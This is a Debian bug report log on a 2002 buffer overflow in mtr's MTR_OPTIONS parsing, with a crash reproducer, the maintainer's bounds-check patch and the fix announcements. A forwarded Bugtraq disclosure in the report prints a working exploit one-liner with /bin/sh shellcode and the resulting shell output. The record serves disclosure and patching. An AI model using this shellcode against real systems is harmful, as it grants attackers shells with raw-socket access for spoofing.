Debian Bug report logs - #137102
mtr: array overflow in parse_mtr_options

version graph

Package: mtr; Maintainer for mtr is Robert Woodcock <rcw@debian.org>; Source for mtr is src:mtr.

Reported by: Colin Phipps <cph@cph.demon.co.uk>

Date: Wed, 6 Mar 2002 17:03:04 UTC

Severity: grave

Tags: security

Found in version 0.45-1

Fixed in version mtr/0.41-6

Done: Robert Woodcock <rcw@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Robert Woodcock <rcw@debian.org>, mtr@packages.qa.debian.org:
Bug#137102; Package mtr. Full text and rfc822 format available.

Acknowledgement sent to Colin Phipps <cph@cph.demon.co.uk>:
New Bug report received and forwarded. Copy sent to Robert Woodcock <rcw@debian.org>, mtr@packages.qa.debian.org. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Colin Phipps <cph@cph.demon.co.uk>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: mtr: array overflow in parse_mtr_options
Date: Wed, 6 Mar 2002 16:58:57 +0000
Package: mtr
Version: 0.45-1
Severity: grave
Justification: user security hole
File: /usr/bin/mtr
Tags: security

Debian is vulnerable to this.

debian/mtr-0.45% MTR_OPTIONS=`perl -e 'print "A "x150'` mtr
zsh: segmentation fault  MTR_OPTIONS=`perl -e 'print "A "x150'` mtr

-----Forwarded Message-----
> From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
> To: bugtraq@securityfocus.com
> Subject: mtr 0.45, 0.46
> Date: 06 Mar 2002 15:41:43 +0100
> 
> Few days ago, a new version of mtr has been released. Authors wrote
> in CHANGELOG, that they fixed a non-exploitable buffer overflow.
> In fact, this vulnerability is very easly exploitable and allows
> attacker to gain access to raw socket, which makes possible ip
> spoofing
> and other malicious network activity.
> 
> The sample exploit is TRIVIAL because of strtok/while loop in
> vulnerable code.
> 
> clitoris:/home/venglin/mtr-0.45> uname -smr
> Linux 2.4.8-26mdk i686
> clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A
> "x130 .
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
> clitoris:/home/venglin/mtr-0.45> ./mtr
> sh-2.05$
> 
> At this point, exec'd shell has a raw socket opened:
> 
> clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
> sh        17263 venglin    3u   raw                        605400
> 00000000:00FF->00000000:0000 st=07
> sh        17263 venglin    4u   raw                        605401
> 00000000:0001->00000000:0000 st=07
> sh-2.05$ ls -la /proc/self/fd/
> total 0
> dr-x------    2 venglin  venglin         0 Mar  6 15:40 .
> dr-xr-xr-x    3 venglin  venglin         0 Mar  6 15:40 ..
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 0 ->
> /dev/pts/6
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 1 ->
> /dev/pts/6
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 2 ->
> /dev/pts/6
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 3 ->
> socket:[605400]
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 4 ->
> socket:[605401]
> lr-x------    1 venglin  venglin        64 Mar  6 15:40 5 ->
> /proc/17318/fd
> 
> -- 
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL:
> PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP:
> D48684904685DF43EA93AFA13BE170BF *

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux nausea.netcraft.com 2.4.18 #1 Tue Feb 26 10:31:34 GMT 2002 i686
Locale: LANG=en_GB, LC_CTYPE=en_GB

Versions of packages mtr depends on:
ii  libc6                    2.2.5-3         GNU C Library: Shared libraries an
ii  libglib1.2               1.2.10-4        The GLib library of C routines
ii  libgtk1.2                1.2.10-9        The GIMP Toolkit set of widgets fo
ii  libncurses5              5.2.20020112a-3 Shared libraries for terminal hand
ii  xlibs                    4.1.0-14        X Window System client libraries



Information forwarded to debian-bugs-dist@lists.debian.org, mtr@packages.qa.debian.org:
Bug#137102; Package mtr. Full text and rfc822 format available.

Acknowledgement sent to Robert Woodcock <rcw@debian.org>:
Extra info received and forwarded to list. Copy sent to mtr@packages.qa.debian.org. Full text and rfc822 format available.

Message #10 received at 137102@bugs.debian.org (full text, mbox):

From: Robert Woodcock <rcw@debian.org>
To: Colin Phipps <cph@cph.demon.co.uk>, 137102@bugs.debian.org
Subject: Re: Bug#137102: mtr: array overflow in parse_mtr_options
Date: Wed, 6 Mar 2002 09:44:58 -0800
On Wed, Mar 06, 2002 at 04:58:57PM +0000, Colin Phipps wrote:
> Debian is vulnerable to this.
> 
> debian/mtr-0.45% MTR_OPTIONS=`perl -e 'print "A "x150'` mtr
> zsh: segmentation fault  MTR_OPTIONS=`perl -e 'print "A "x150'` mtr

Crap. I wish the folks at Bitwizard had let me know.

Packages are building for stable now.

Here's the relevant patch which applies cleanly to 0.41:

--- mtr-0.46/mtr.c      Sun Feb 10 00:04:36 2002
+++ mtr-0.47/mtr.c      Tue Feb 19 17:52:00 2002
@@ -144,14 +144,17 @@
   argv[0] = "mtr";
   argc = 1;
   p = strtok (string, " \t");
-  while (p) {
+  while (p && (argc < (sizeof(argv)/sizeof(argv[0])))) {
     argv[argc++] = p;
     p = strtok (NULL, " \t");
   }
+  if (p) {
+    fprintf (stderr, "Warning: extra arguments ignored: %s", p);
+  }
-- 
Robert Woodcock - rcw@debian.org
"The nuclear bomb. Does that bother you? I just want you to think big."
	-- Nixon to Kissinger, April 25, 1972



Reply sent to Robert Woodcock <rcw@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Colin Phipps <cph@cph.demon.co.uk>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #15 received at 137102-close@bugs.debian.org (full text, mbox):

From: Robert Woodcock <rcw@debian.org>
To: 137102-close@bugs.debian.org
Subject: Bug#137102: fixed in mtr 0.41-6
Date: Wed, 06 Mar 2002 13:02:13 -0500
We believe that the bug you reported is fixed in the latest version of
mtr, which is due to be installed in the Debian FTP archive:

mtr_0.41-6.diff.gz
  to pool/main/m/mtr/mtr_0.41-6.diff.gz
mtr_0.41-6.dsc
  to pool/main/m/mtr/mtr_0.41-6.dsc
mtr_0.41-6_i386.deb
  to pool/main/m/mtr/mtr_0.41-6_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 137102@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Robert Woodcock <rcw@debian.org> (supplier of updated mtr package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.6
Date: Wed,  6 Mar 2002 09:50:29 -0800
Source: mtr
Binary: mtr
Architecture: source i386
Version: 0.41-6
Distribution: stable
Urgency: high
Maintainer: Robert Woodcock <rcw@debian.org>
Description: 
 mtr        - Full screen ncurses or X11 traceroute tool
Closes: 137102
Changes: 
 mtr (0.41-6) stable; urgency=high
 .
   * Security fix for format overflow with MTR_OPTIONS, closes: #137102
   * Added build-depends line from unstable package
Files: 
 f72f30e0c8e34b19affe5219bb901395 626 net optional mtr_0.41-6.dsc
 4c7d03ec09a6d34e42464ba1ec2b0b7e 15772 net optional mtr_0.41-6.diff.gz
 4ba7815729e243669e8d825f5b8373a2 37908 net optional mtr_0.41-6_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8hlZB9c5o62/wq/IRAgmtAJ9iUQSq1j7mFGfO4M9HOfwC+AMUwgCfeHc2
ZvcCNWng7XPmc95Pr9qLJ2w=
=Jv6N
-----END PGP SIGNATURE-----




Message #16 received at 137102-close@bugs.debian.org (full text, mbox):

From: Robert Woodcock <rcw@debian.org>
To: 137102-close@bugs.debian.org
Subject: Bug#137102: fixed in mtr 0.41-6
Date: Mon, 01 Apr 2002 18:37:43 -0500
We believe that the bug you reported is fixed in the latest version of
mtr, which is due to be installed in the Debian FTP archive:

mtr_0.41-6.diff.gz
  to pool/main/m/mtr/mtr_0.41-6.diff.gz
mtr_0.41-6.dsc
  to pool/main/m/mtr/mtr_0.41-6.dsc
mtr_0.41-6_i386.deb
  to pool/main/m/mtr/mtr_0.41-6_i386.deb


    Note that this package is not part of the released stable Debian
    distribution.  It may have dependencies on other unreleased software,
    or other instabilities.  Please take care if you wish to install it.
    The update will eventually make its way into the next released Debian
    distribution.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 137102@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Robert Woodcock <rcw@debian.org> (supplier of updated mtr package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.6
Date: Wed,  6 Mar 2002 09:50:29 -0800
Source: mtr
Binary: mtr
Architecture: source i386
Version: 0.41-6
Distribution: stable
Urgency: high
Maintainer: Robert Woodcock <rcw@debian.org>
Description: 
 mtr        - Full screen ncurses or X11 traceroute tool
Closes: 137102
Changes: 
 mtr (0.41-6) stable; urgency=high
 .
   * Security fix for format overflow with MTR_OPTIONS, closes: #137102
   * Added build-depends line from unstable package
Files: 
 f72f30e0c8e34b19affe5219bb901395 626 net optional mtr_0.41-6.dsc
 4c7d03ec09a6d34e42464ba1ec2b0b7e 15772 net optional mtr_0.41-6.diff.gz
 4ba7815729e243669e8d825f5b8373a2 37908 net optional mtr_0.41-6_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8hlZB9c5o62/wq/IRAgmtAJ9iUQSq1j7mFGfO4M9HOfwC+AMUwgCfeHc2
ZvcCNWng7XPmc95Pr9qLJ2w=
=Jv6N
-----END PGP SIGNATURE-----




Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 18:40:40 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.